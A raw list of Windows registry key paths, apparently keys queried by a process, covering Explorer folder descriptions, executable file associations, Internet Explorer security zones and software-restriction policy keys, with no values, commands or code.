HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DropTarget
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\wscript.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ddeexec
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Common Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Common Start Menu
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType
